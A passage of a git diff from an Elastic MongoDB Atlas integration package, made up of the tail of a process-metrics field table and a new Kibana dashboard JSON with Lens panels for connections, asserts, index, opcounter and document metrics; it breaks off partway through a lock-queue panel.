mongodb_atlas.process.query.targeting.scanned_per_returned | Ratio of the number of index items scanned to the number of documents returned. | double | | gauge | +| mongodb_atlas.process.restart.in_last_hour | Number of times the host restarted within the previous hour. | double | | gauge | +| mongodb_atlas.process.swap.usage.free.max.kb | Max amount of swap space free. | double | | counter | +| mongodb_atlas.process.swap.usage.total.free | Total amount of swap space free. | double | | gauge | +| mongodb_atlas.process.swap.usage.total.used | Total amount of swap space in use. | double | | gauge | +| mongodb_atlas.process.swap.usage.used.max.kb | Max amount of swap space in use. | double | | counter | +| mongodb_atlas.process.system.cpu.guest.max.pct | Max amount of CPU time spent running a virtual CPU for guest operating systems. | double | percent | counter | +| mongodb_atlas.process.system.cpu.guest.pct | Tracks CPU time consumed by guest operating systems, like virtual machines, on the host system. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.iowait.max.pct | Max amount of CPU time spent waiting for I/O operations to complete. | double | percent | counter | +| mongodb_atlas.process.system.cpu.iowait.pct | The CPU time spent waiting for I/O operations to complete. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.irq.max.pct | Max amount of CPU time spent servicing hardware interrupts. | double | percent | counter | +| mongodb_atlas.process.system.cpu.irq.pct | The portion of CPU time spent servicing hardware interrupts. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.kernel.max.pct | Max amount of CPU time spent in kernel space, executing system calls and handling hardware interrupts. | double | percent | counter | +| mongodb_atlas.process.system.cpu.kernel.pct | The portion of CPU time spent executing kernel space processes and handling system calls. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.nice.pct | The portion of CPU time allocated to processes with a 'nice' priority level. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.softirq.max.pct | Max amount of CPU time spent servicing soft interrupts, which are interrupts triggered by software. | double | percent | counter | +| mongodb_atlas.process.system.cpu.softirq.pct | The CPU time spent handling software-generated interrupts. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.steal.max.pct | Max amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. | double | percent | counter | +| mongodb_atlas.process.system.cpu.steal.pct | The amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. | double | percent | gauge | +| mongodb_atlas.process.system.cpu.user.max.pct | Max amount of CPU time spent in user space, executing user-level processes and applications. | double | percent | counter | +| mongodb_atlas.process.system.cpu.user.pct | The portion of CPU time spent executing user space processes and running applications. | double | percent | gauge | +| mongodb_atlas.process.system.memory.available.kb | Physical memory available in kilobytes. | double | | gauge | +| mongodb_atlas.process.system.memory.available.max.kb | Max Physical memory available in kilobytes. | double | | counter | +| mongodb_atlas.process.system.memory.free.kb | Physical memory free in kilobytes. | double | | gauge | +| mongodb_atlas.process.system.memory.free.max.kb | Max Physical memory free in kilobytes. | double | | counter | +| mongodb_atlas.process.system.memory.used.kb | Physical memory used in kilobytes. | double | | gauge | +| mongodb_atlas.process.system.memory.used.max.kb | Max Physical memory used in kilobytes. | double | | counter | +| mongodb_atlas.process.system.network.in | Incoming network throughput in bytes per second. | double | | gauge | +| mongodb_atlas.process.system.network.max.in | Max Incoming network throughput in bytes per second. | double | | counter | +| mongodb_atlas.process.system.network.max.out | Max Outgoing network throughput in bytes per second. | double | | counter | +| mongodb_atlas.process.system.network.out | Outgoing network throughput in bytes per second. | double | | gauge | +| mongodb_atlas.process.system.normalized.cpu.guest.max.pct | Max Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.guest.pct | Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.iowait.max.pct | Max CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.iowait.pct | CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.irq.max.pct | Max CPU usage of hardware interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.irq.pct | NORMALIZED irq CPU utilization across various processes for a server | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.kernel.max.pct | Max kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.kernel.pct | Kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.nice.max.pct | Max CPU usage of processes with a positive nice value, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.nice.pct | NORMALIZED nice CPU utilization across various processes for a server | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.softirq.max.pct | Max CPU usage of software interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.softirq.pct | NORMALIZED softirq CPU utilization across various processes for a server | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.steal.max.pct | Max The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.steal.pct | The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.steal.user.max.pct | Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.steal.user.pct | NORMALIZED CPU user space utilization across various processes for a server | double | percent | gauge | +| mongodb_atlas.process.system.normalized.cpu.user.max.pct | Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.system.normalized.cpu.user.pct | The portion of CPU time spent executing user space processes and running applications. | double | percent | gauge | +| mongodb_atlas.process.ticket.available.read.count | The number of read tickets available to the WiredTiger storage engine. | long | | gauge | +| mongodb_atlas.process.ticket.available.write.count | The number of write tickets available to the WiredTiger storage engine. | long | | gauge | +| mongodb_atlas.process_id | Combination of hostname and Internet Assigned Numbers Authority (IANA) port that serves the MongoDB process. | keyword | | | + diff --git a/packages/mongodb_atlas/img/mongodb_atlas-process-dashboard.png b/packages/mongodb_atlas/img/mongodb_atlas-process-dashboard.png new file mode 100644 index 00000000000..a611641a908 Binary files /dev/null and b/packages/mongodb_atlas/img/mongodb_atlas-process-dashboard.png differ diff --git a/packages/mongodb_atlas/kibana/dashboard/mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72.json b/packages/mongodb_atlas/kibana/dashboard/mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72.json new file mode 100644 index 00000000000..9ceb73a7f9b --- /dev/null +++ b/packages/mongodb_atlas/kibana/dashboard/mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72.json @@ -0,0 +1,2463 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d0364e5c-0c5b-43bd-a3df-bcc9572f3b2c\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":false,\"width\":\"large\",\"explicitInput\":{\"id\":\"d0364e5c-0c5b-43bd-a3df-bcc9572f3b2c\",\"fieldName\":\"mongodb_atlas.process_id\",\"title\":\"Process ID\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "mongodb_atlas.process" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "mongodb_atlas.process" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-cd73b358-0ca8-41b8-98a1-376efe82ebeb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cd73b358-0ca8-41b8-98a1-376efe82ebeb": { + "columnOrder": [ + "fd8c7cd5-bf51-4b84-963e-02e291f76939" + ], + "columns": { + "fd8c7cd5-bf51-4b84-963e-02e291f76939": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.database.size.total.bytes\": *" + }, + "isBucketed": false, + "label": " Database Total Size", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.database.size.total.bytes" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "icon": "empty", + "layerId": "cd73b358-0ca8-41b8-98a1-376efe82ebeb", + "layerType": "data", + "metricAccessor": "fd8c7cd5-bf51-4b84-963e-02e291f76939", + "showBar": false, + "subtitle": "" + } + }, + "title": "Database size [Metrics MongoDB Atlas]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "8f13f3ed-3700-4ea1-9f9a-396a1f1fe178", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "8f13f3ed-3700-4ea1-9f9a-396a1f1fe178", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9cc9c8cf-8031-491d-ad68-65c9bee42961", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9cc9c8cf-8031-491d-ad68-65c9bee42961": { + "columnOrder": [ + "74e8f796-789a-43d1-a887-f52ed019052c", + "14aaad1c-1caf-4a90-bc22-aeccb741fcfb" + ], + "columns": { + "14aaad1c-1caf-4a90-bc22-aeccb741fcfb": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.connections\": *" + }, + "isBucketed": false, + "label": "connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.connections" + }, + "74e8f796-789a-43d1-a887-f52ed019052c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "14aaad1c-1caf-4a90-bc22-aeccb741fcfb" + ], + "layerId": "9cc9c8cf-8031-491d-ad68-65c9bee42961", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "74e8f796-789a-43d1-a887-f52ed019052c", + "yConfig": [ + { + "axisMode": "auto", + "color": "#6092c0", + "forAccessor": "14aaad1c-1caf-4a90-bc22-aeccb741fcfb" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "68be7160-9c8d-46a7-9daa-ee2cf0337f45", + "w": 38, + "x": 10, + "y": 0 + }, + "panelIndex": "68be7160-9c8d-46a7-9daa-ee2cf0337f45", + "title": "Number of connections over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9e13bc03-ef64-4c17-aa85-6a64c035c2df", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9e13bc03-ef64-4c17-aa85-6a64c035c2df": { + "columnOrder": [ + "f1ed6868-aad9-4cc3-bf78-a8cac859e7a5", + "c7e30443-618a-4cad-ab44-7c62c66cdaca", + "87067ba0-299a-4b37-8316-f98fab6e650b", + "8c2c5e55-bb96-4171-965e-5a9eb5f5beea", + "fe15665e-e65e-4670-a29c-819f913b0c73" + ], + "columns": { + "87067ba0-299a-4b37-8316-f98fab6e650b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "regular", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.regular" + }, + "8c2c5e55-bb96-4171-965e-5a9eb5f5beea": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "user", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.user" + }, + "c7e30443-618a-4cad-ab44-7c62c66cdaca": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "msg", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.msg" + }, + "f1ed6868-aad9-4cc3-bf78-a8cac859e7a5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "fe15665e-e65e-4670-a29c-819f913b0c73": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "warning", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.warning" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "c7e30443-618a-4cad-ab44-7c62c66cdaca", + "87067ba0-299a-4b37-8316-f98fab6e650b", + "8c2c5e55-bb96-4171-965e-5a9eb5f5beea", + "fe15665e-e65e-4670-a29c-819f913b0c73" + ], + "layerId": "9e13bc03-ef64-4c17-aa85-6a64c035c2df", + "layerType": "data", + "seriesType": "line", + "xAccessor": "f1ed6868-aad9-4cc3-bf78-a8cac859e7a5", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "" + } + }, + "title": "mongodb_atlas-process", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "25051106-745b-4ba4-a8d9-49034e1f4abb", + "w": 16, + "x": 0, + "y": 9 + }, + "panelIndex": "25051106-745b-4ba4-a8d9-49034e1f4abb", + "title": "Assert states over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d632a616-b51b-4039-af6c-a764c3635443", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "d632a616-b51b-4039-af6c-a764c3635443": { + "columnOrder": [ + "7a81de3b-d112-402e-bd4a-59d91c1f38b2", + "eb15436c-9152-4074-bce9-63eaf87d6ea8", + "e470daec-48de-4dd3-8f95-820af46f3b0e", + "6fd70806-0fdc-46f3-bd72-ea9a394cbaa3" + ], + "columns": { + "6fd70806-0fdc-46f3-bd72-ea9a394cbaa3": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.index.btree.hits.count\": *" + }, + "isBucketed": false, + "label": "hits", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.index.btree.hits.count" + }, + "7a81de3b-d112-402e-bd4a-59d91c1f38b2": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e470daec-48de-4dd3-8f95-820af46f3b0e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.index.btree.miss.count\": *" + }, + "isBucketed": false, + "label": "miss", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.index.btree.miss.count" + }, + "eb15436c-9152-4074-bce9-63eaf87d6ea8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.index.btree.access.count\": *" + }, + "isBucketed": false, + "label": "access", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.index.btree.access.count" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6fd70806-0fdc-46f3-bd72-ea9a394cbaa3", + "eb15436c-9152-4074-bce9-63eaf87d6ea8", + "e470daec-48de-4dd3-8f95-820af46f3b0e" + ], + "layerId": "d632a616-b51b-4039-af6c-a764c3635443", + "layerType": "data", + "seriesType": "line", + "xAccessor": "7a81de3b-d112-402e-bd4a-59d91c1f38b2" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "262ae11d-86af-4aa4-b53a-55dabb3bbcc2", + "w": 16, + "x": 16, + "y": 9 + }, + "panelIndex": "262ae11d-86af-4aa4-b53a-55dabb3bbcc2", + "title": "B-tree indexes over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dec2bdc9-b28b-4737-b097-4784fc539a8e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "dec2bdc9-b28b-4737-b097-4784fc539a8e": { + "columnOrder": [ + "668f07e9-4ede-4fbe-9d08-6c023bb2c714", + "18cc39e3-ab7a-4809-8f67-d69264e1ddf6", + "c97d9c01-61c9-4655-af23-2eebaa65d7b6", + "cd716f48-2a24-45bd-ac5c-21bb1fb265b2", + "37103fc1-5df4-41d7-8e3d-64a0215d2cd8" + ], + "columns": { + "18cc39e3-ab7a-4809-8f67-d69264e1ddf6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "cmd", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.cmd" + }, + "37103fc1-5df4-41d7-8e3d-64a0215d2cd8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "insert", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.insert" + }, + "668f07e9-4ede-4fbe-9d08-6c023bb2c714": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c97d9c01-61c9-4655-af23-2eebaa65d7b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "delete", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.delete" + }, + "cd716f48-2a24-45bd-ac5c-21bb1fb265b2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "getmore", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.getmore" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "18cc39e3-ab7a-4809-8f67-d69264e1ddf6", + "c97d9c01-61c9-4655-af23-2eebaa65d7b6", + "cd716f48-2a24-45bd-ac5c-21bb1fb265b2", + "37103fc1-5df4-41d7-8e3d-64a0215d2cd8" + ], + "layerId": "dec2bdc9-b28b-4737-b097-4784fc539a8e", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "668f07e9-4ede-4fbe-9d08-6c023bb2c714" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Average" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "20587478-8b77-4d72-ab6f-0e4781c04306", + "w": 16, + "x": 32, + "y": 18 + }, + "panelIndex": "20587478-8b77-4d72-ab6f-0e4781c04306", + "title": "Opcounter operations over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a642128d-1d1f-433c-9412-738ea3def1fb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "a642128d-1d1f-433c-9412-738ea3def1fb": { + "columnOrder": [ + "ead4bce5-a55b-4efa-84c2-b1f92e778c8d", + "0c7ad04a-7741-4dc7-ac17-97ee29dbb865", + "f68edb12-70dd-4291-ad51-031dcf826a3d", + "8bb370a4-15d0-4956-a6fb-a80f64891a4f", + "d3bc1949-119f-4c77-8d78-839f168c26dc" + ], + "columns": { + "0c7ad04a-7741-4dc7-ac17-97ee29dbb865": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.inserted\": *" + }, + "isBucketed": false, + "label": "inserted", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.inserted" + }, + "8bb370a4-15d0-4956-a6fb-a80f64891a4f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.updated\": *" + }, + "isBucketed": false, + "label": "updated", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.updated" + }, + "d3bc1949-119f-4c77-8d78-839f168c26dc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.returned\": *" + }, + "isBucketed": false, + "label": "returned", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.returned" + }, + "ead4bce5-a55b-4efa-84c2-b1f92e778c8d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f68edb12-70dd-4291-ad51-031dcf826a3d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.deleted\": *" + }, + "isBucketed": false, + "label": "deleted", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.deleted" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "0c7ad04a-7741-4dc7-ac17-97ee29dbb865", + "f68edb12-70dd-4291-ad51-031dcf826a3d", + "8bb370a4-15d0-4956-a6fb-a80f64891a4f", + "d3bc1949-119f-4c77-8d78-839f168c26dc" + ], + "layerId": "a642128d-1d1f-433c-9412-738ea3def1fb", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ead4bce5-a55b-4efa-84c2-b1f92e778c8d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "c0fee763-07b4-4e33-9435-f5953a528bfc", + "w": 16, + "x": 0, + "y": 18 + }, + "panelIndex": "c0fee763-07b4-4e33-9435-f5953a528bfc", + "title": "Document operations over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-cd89a53e-75f8-4ccd-9234-05124250cc7b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cd89a53e-75f8-4ccd-9234-05124250cc7b": { + "columnOrder": [ + "98425ac2-3325-414a-a990-b290ad0ebdf2", + "9e1d1374-9c80-4d65-9ecd-4ae5c898bf9c", + "430fe7e4-1762-4390-b786-6d91aac55994" + ], + "columns": { + "430fe7e4-1762-4390-b786-6d91aac55994": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.global.lock.current_queue.writer.count\": *" + }, + "isBucketed": false, + "label": "writer", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.global.lock.current_queue.writer.count" + }, + "98425ac2-3325-414a-a990-b290ad0ebdf2": { + "dataType": "date", + "isBucketed": 